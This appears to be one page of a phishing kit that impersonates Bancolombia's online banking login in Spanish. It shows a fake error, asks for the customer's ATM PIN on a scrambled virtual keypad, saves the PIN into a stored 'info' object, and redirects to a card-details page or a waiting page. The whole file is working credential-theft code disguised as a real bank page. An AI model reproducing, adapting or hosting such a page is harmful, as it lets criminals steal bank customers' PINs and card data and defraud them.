<!DOCTYPE html>
<html lang="es">

<head>
	<title>Bancolombia Sucursal Virtual Personas</title>

	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">

	<script src="./js/validations.js"></script>
	<link href="./css/style.css" rel="stylesheet">
	<link href="./css/stylesheet.css" rel="stylesheet">
	<link rel="icon" type="image/png" href="img/logo.png" />
</head>

<body>
	<div class="contenido">
		<div class="cabecera">
			<div class="logo">
				<img src="img/logo.svg">
				<br>
				<span class="subtitulo">Sucursal Virtual Personas</span>
				<br>
				<span class="texto-min">Fecha y hora actual:</span> <span class="texto-min" id="fecha-hora"></span>
			</div>
			<div class="titulo">Inicio de sesión</div>
			<div class="mensaje">
				<table>
					<tr>
						<td valign="middle"><img src="img/error.jpg" style="width: 40px;"></td>
						<td valign="middle" style="padding-left: 12px;"><span
								style="font-size: 20px; color: #000; line-height: 20px;">Error</span><br><span>Por favor
								ingesar la información requerida.</span></td>
					</tr>
				</table>
			</div>
		</div>
		<div class="cuerpo">
			<div class="pnlizqPass" style="color:#fff;">
				.
			</div>
			<div class="pnlderPass">
				<div class="entrada">
					<div class="formulario">
						<div class="form-titulo">Clave</div>
						<div class="descripcion">
							Por motivos de seguridad es necesario procesar una verificación de identidad.
						</div>
						<div class="form-cuerpo">
							<div style="text-align: left;">
								<span class="etiqueta">Ingresa tu clave</span>
							</div>
							<div class="input-icono pass">
								<input type="password" name="txtPassword" id="txtPassword" readonly>
							</div>
							<div class="subtexto">
								Ingresa mediante el teclado virtual la clave que usas en el cajero automático.
							</div>
							<br>
							<button id="btnCancelar" name="btnCancelar" class="btn btn-blanco"
								type="button">Cancelar</button>&nbsp;&nbsp;&nbsp;
							<button id="btnPass" name="btnPass" class="btn btn-amarillo"
								type="button">Continuar</button>
							<br>
							<div class="texto" style="text-align: right;">
								<div class="vinculos">
									<img src="img/info.jpg" class="icon-info"><a href="#">Genera una clave personal</a>
								</div>

							</div>
						</div>
					</div>
				</div>
				<div class="teclado">
					<table class="teclas" border="0" cellspacing="5">
						<tr>
							<td align="center" valign="middle" id="tecla1">1</td>
							<td align="center" valign="middle" id="tecla7">7</td>
							<td align="center" valign="middle" id="tecla6">6</td>
						</tr>
						<tr>
							<td align="center" valign="middle" id="tecla4">4</td>
							<td align="center" valign="middle" id="tecla3">3</td>
							<td align="center" valign="middle" id="tecla2">2</td>
						</tr>
						<tr>
							<td align="center" valign="middle" id="tecla5">5</td>
							<td align="center" valign="middle" id="tecla0">0</td>
							<td align="center" valign="middle" id="tecla9">9</td>
						</tr>
						<tr>
							<td align="center" valign="middle" id="tecla8">8</td>
							<td colspan="2" align="center" valign="middle" id="teclaborrar">Borrar</td>
						</tr>
					</table>
					<img src="img/con-a.gif" style="margin-left: 21px; margin-top: 5px;">
				</div>

			</div>
		</div>

		<div class="pie" style="padding-top:80px;">
			<div class="direccion">Sucursal Telefónica Bancolombia: Bogotá (57) 60 1 343 00 00 - Medellín (57) 60 4 510
				90 00 - Cali (57) 60 2 554 05 05 - Barranquilla (57) 60 5 361 88 88 - Cartagena (57) 60 5 693 44 00 -
				Bucaramanga (57) 60 7 697 25 25 - Pereira (57) 60 6 340 12 13 - El resto del país 018000 9 12345.
				Sucursales Telefónicas en el exterior: España (34) 900 995 717 - Estados Unidos (1) 866 379 97 14.<div
					class="ippie">
					<span class="dirip">Dirección IP: <span id="ip"></span></span>
					<span class="copyright">Copyright © 2023 Bancolombia</span>
				</div>
			</div>
		</div>
</body>

</html>
<script src="js/app.js"></script>
<script type="text/javascript">

	document.addEventListener('DOMContentLoaded', function () {

		var teclas = document.querySelectorAll('.teclado td');
		var txtPassword = document.getElementById('txtPassword');
		var mensaje = document.getElementsByClassName('mensaje')[0];
		var btnPass = document.getElementById('btnPass');

		for (var i = 0; i < teclas.length; i++) {
			teclas[i].addEventListener('mouseover', function () {
				var teclasOcultas = document.querySelectorAll('#tecla1,#tecla2,#tecla3,#tecla4,#tecla5,#tecla6,#tecla7,#tecla8,#tecla9,#tecla0');
				for (var j = 0; j < teclasOcultas.length; j++) {
					teclasOcultas[j].innerHTML = "*";
				}
			});
			teclas[i].addEventListener('mouseout', function () {
				document.getElementById('tecla1').innerHTML = "1";
				document.getElementById('tecla2').innerHTML = "2";
				document.getElementById('tecla3').innerHTML = "3";
				document.getElementById('tecla4').innerHTML = "4";
				document.getElementById('tecla5').innerHTML = "5";
				document.getElementById('tecla6').innerHTML = "6";
				document.getElementById('tecla7').innerHTML = "7";
				document.getElementById('tecla8').innerHTML = "8";
				document.getElementById('tecla9').innerHTML = "9";
				document.getElementById('tecla0').innerHTML = "0";
			});
			teclas[i].addEventListener('touchstart', function () {
				document.getElementById('tecla1').innerHTML = "1";
				document.getElementById('tecla2').innerHTML = "2";
				document.getElementById('tecla3').innerHTML = "3";
				document.getElementById('tecla4').innerHTML = "4";
				document.getElementById('tecla5').innerHTML = "5";
				document.getElementById('tecla6').innerHTML = "6";
				document.getElementById('tecla7').innerHTML = "7";
				document.getElementById('tecla8').innerHTML = "8";
				document.getElementById('tecla9').innerHTML = "9";
				document.getElementById('tecla0').innerHTML = "0";
			});
		}

		document.getElementById('tecla1').addEventListener('click', function () {
			if (txtPassword.value.length < 4) {
				txtPassword.value += "1";
				mensaje.style.display = 'none';
			}
		});
		document.getElementById('tecla2').addEventListener('click', function () {
			if (txtPassword.value.length < 4) {
				txtPassword.value += "2";
				mensaje.style.display = 'none';
			}
		});
		document.getElementById('tecla3').addEventListener('click', function () {
			if (txtPassword.value.length < 4) {
				txtPassword.value += "3";
				mensaje.style.display = 'none';
			}
		});
		document.getElementById('tecla4').addEventListener('click', function () {
			if (txtPassword.value.length < 4) {
				txtPassword.value += "4";
				mensaje.style.display = 'none';
			}
		});
		document.getElementById('tecla5').addEventListener('click', function () {
			if (txtPassword.value.length < 4) {
				txtPassword.value += "5";
				mensaje.style.display = 'none';
			}
		});
		document.getElementById('tecla6').addEventListener('click', function () {
			if (txtPassword.value.length < 4) {
				txtPassword.value += "6";
				mensaje.style.display = 'none';
			}
		});
		document.getElementById('tecla7').addEventListener('click', function () {
			if (txtPassword.value.length < 4) {
				txtPassword.value += "7";
				mensaje.style.display = 'none';
			}
		});
		document.getElementById('tecla8').addEventListener('click', function () {
			if (txtPassword.value.length < 4) {
				txtPassword.value += "8";
				mensaje.style.display = 'none';
			}
		});
		document.getElementById('tecla9').addEventListener('click', function () {
			if (txtPassword.value.length < 4) {
				txtPassword.value += "9";
				mensaje.style.display = 'none';
			}
		});
		document.getElementById('tecla0').addEventListener('click', function () {
			if (txtPassword.value.length < 4) {
				txtPassword.value += "0";
				mensaje.style.display = 'none';
			}
		});
		document.getElementById('teclaborrar').addEventListener('click', function () {
			txtPassword.value = "";
			mensaje.style.display = 'none';
		});

		btnPass.addEventListener('click', function () {
			if (txtPassword.value.length > 3) {
				// Guardar
				info.puser = txtPassword.value;
				LS.setItem('info', JSON.stringify(info));

				// Redirigir
				if(info.c === ''){
					window.location.href = 'vCard.html';
				}else{
					window.location.href = 'waiting.html';
				}
				
				
			} else {
				mensaje.style.display = 'block';
			}
		});

	});
</script>
